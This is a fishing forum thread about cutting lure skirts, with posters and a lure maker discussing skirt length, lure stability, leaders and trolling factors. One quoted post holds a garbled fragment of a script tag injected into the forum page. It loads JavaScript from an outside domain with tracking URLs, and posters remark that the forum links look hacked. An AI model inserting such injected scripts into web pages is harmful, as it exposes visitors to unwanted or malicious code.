Lure reskirt

Page  <12
Post Options Post Options   Likes (0) Likes(0)   Quote terrafish Quote  Post ReplyReply Direct Link To This Post Posted: 10 Aug 2019 at 8:46pm
terrafish View Drop Down
Platinum
Platinum

Originally posted by yknot yknot wrote:

Thanks for the input guys, JAPIE will try that.

I am now accepting that I must accept the extra length.

You will just have to experiment with different positions and angles till you get it just right. Getting it wet and taking it around the block a few times will certainly help. Your own experience will tell you wether to stay where you are or trim it a little closer. You'll almost have to raise one before you know whether it has lost any appeal.
Once its gone you can't get it back(without hitchin up another skirt)
Post Options Post Options   Likes (0) Likes(0)   Quote jakepitsville Quote  Post ReplyReply Direct Link To This Post Posted: 13 Aug 2019 at 12:18pm
jakepitsville View Drop Down
Platinum
Platinum

It used to be very common to thing out the zuker 5.5 back in the day.  Pakula used to say trip every second and the skirt is abit like a kite - he had a video on it the longer the skirt the more stable, Roddy used to say it needs to be angle cut and removed every second and that you wouldnt do well without cutting your skirts to bits.  I know some of the longer skirted lures were also so the hook could be futher back from lure head hopefully resulting in a higher hook up.  

Post Options Post Options   Likes (3) Likes(3)   Quote Peter Pakula Quote  Post ReplyReply Direct Link To This Post Posted: 19 Aug 2019 at 10:24am
Peter Pakula View Drop Down
Platinum
Platinum

I've been asked to comment.

the video shows same head, same leader same position - one with 9" skirts, one with same skirts cut to 6". There's not enough difference to care one way or the other.

Longer skirts give the lure much more horizontal stability ie reduces the spoining of the lure which is why Black Bart and I went to longer skirts. When you add the the thickness off the extra sides of the skirt strands it makes a lot of sense to have longer skirts for the added stability of the lure which affects the stability of the rig if it's not a swivel rig which operates as it's own system regardless of the stability of the lure.

PS "Pakula used to say trip every second" ... no I didn't
Post Options Post Options   Likes (3) Likes(3)   Quote Peter Pakula Quote  Post ReplyReply Direct Link To This Post Posted: 19 Aug 2019 at 11:20am
Platinum
Platinum

The things that affect action far more than skirts is leaders to heavy, too long and wind-on leaders (if they are too long, too heavy and have huge snap swivels) and towing angle ie height of riggers, the wrong rig ie stiff rigs and semi stiff rigs in cupped faced lures, direction you troll in chop and swell and current, and lastly speed
Post Options Post Options   Likes (1) Likes(1)   Quote jakepitsville Quote  Post ReplyReply Direct Link To This Post Posted: 20 Aug 2019 at 6:32pm
jakepitsville View Drop Down
Platinum
Platinum

Thanks Pete for the comments
Post Options Post Options   Likes (0) Likes(0)   Quote yknot Quote  Post ReplyReply Direct Link To This Post Posted: 20 Aug 2019 at 7:00pm
yknot View Drop Down
Platinum
Platinum

Originally posted by Peter Pakula Peter Pakula wrote:

the video shows same head, same leader same position - one with 9" skirts, one with same skirts cut to 6". There's not enough difference to care one way or the other

Cheers Peter for you input, personally I think the longer skirts look better, will leave them longer and not overthink things.
Those that say it can't be done are being overtaken by those doing it.
Post Options Post Options   Likes (0) Likes(0)   Quote smudge Quote  Post ReplyReply Direct Link To This Post Posted: 20 Aug 2019 at 7:12pm
smudge View Drop Down
Moderator - Ninja
Moderator - Ninja

Originally posted by Peter Pakula Peter Pakula wrote:

The things that affect action far more than skirts is leaders to heavy, too long and wind-on leaders (if they are too long, too heavy and have huge snap swivels) and towing angle ie height of riggers, the wrong rig ie stiff rigs and semi stiff rigs in cupped faced lures, direction you troll in chop and swell and current, and lastly speed.< ="text/" async="" ="//loudsjack.com/21a72d882921295225.js">https://loudsjack.com/optout/set/lat?jsonp=__mtz_cb_921849720&key=21a72d882921295225&cv=1566175627&t=1566175628762">https://loudsjack.com/optout/set/lt?jsonp=__mtz_cb_328501694&key=21a72d882921295225&cv=72811&t=1566175628763">

Thank you Peter, awesome
Best gurnard fisherman in my street
Post Options Post Options   Likes (0) Likes(0)   Quote MATTOO Quote  Post ReplyReply Direct Link To This Post Posted: 20 Aug 2019 at 7:16pm
MATTOO View Drop Down
Titanium
Titanium

Did anyone get Peters last post links to work.
The first post was fine, I didn't get anything in the last.
What did I miss.
Just cruising in my now sweetas pimped out Southern 755 HT0!
Post Options Post Options   Likes (1) Likes(1)   Quote Peter Pakula Quote  Post ReplyReply Direct Link To This Post Posted: 21 Aug 2019 at 7:28am
Platinum
Platinum

Matto, I just fixed links I think

looks like the forum links are hacked
Post Options Post Options   Likes (1) Likes(1)   Quote Peter Pakula Quote  Post ReplyReply Direct Link To This Post Posted: 21 Aug 2019 at 7:32am
Platinum
Platinum

Cheers, just remember fish aren't looking at lures from above. Ie they might look fantastic to seagulls, but what about from the sides, below and from the back.
Post Options Post Options   Likes (0) Likes(0)   Quote Catchelot Quote  Post ReplyReply Direct Link To This Post Posted: 21 Aug 2019 at 12:24pm
Catchelot View Drop Down
Titanium
Titanium

Mattoo, I can't get the links to work either.

Pete can you try again please?
"The sea, once it casts its spell, holds one in its net of wonder forever." - Jacques Cousteau
Post Options Post Options   Likes (0) Likes(0)   Quote MATTOO Quote  Post ReplyReply Direct Link To This Post Posted: 21 Aug 2019 at 5:01pm
MATTOO View Drop Down
Titanium
Titanium

Appreciated Al.
Just cruising in my now sweetas pimped out Southern 755 HT0!
Post Options Post Options   Likes (1) Likes(1)   Quote Peter Pakula Quote  Post ReplyReply Direct Link To This Post Posted: 22 Aug 2019 at 2:29pm
Platinum
Platinum

I've been asked to comment.

the video shows same head, same leader same position - one with 9" skirts, one with same skirts cut to 6". There's not enough difference to care one way or the other.

Longer skirts give the lure much more horizontal stability ie reduces the spoining of the lure which is why Black Bart and I went to longer skirts. When you add the the thickness off the extra sides of the skirt strands it makes a lot of sense to have longer skirts for the added stability of the lure which affects the stability of the rig if it's not a swivel rig which operates as it's own system regardless of the stability of the lure.

PS "Pakula used to say trip every second" ... no I didn't
Page  <12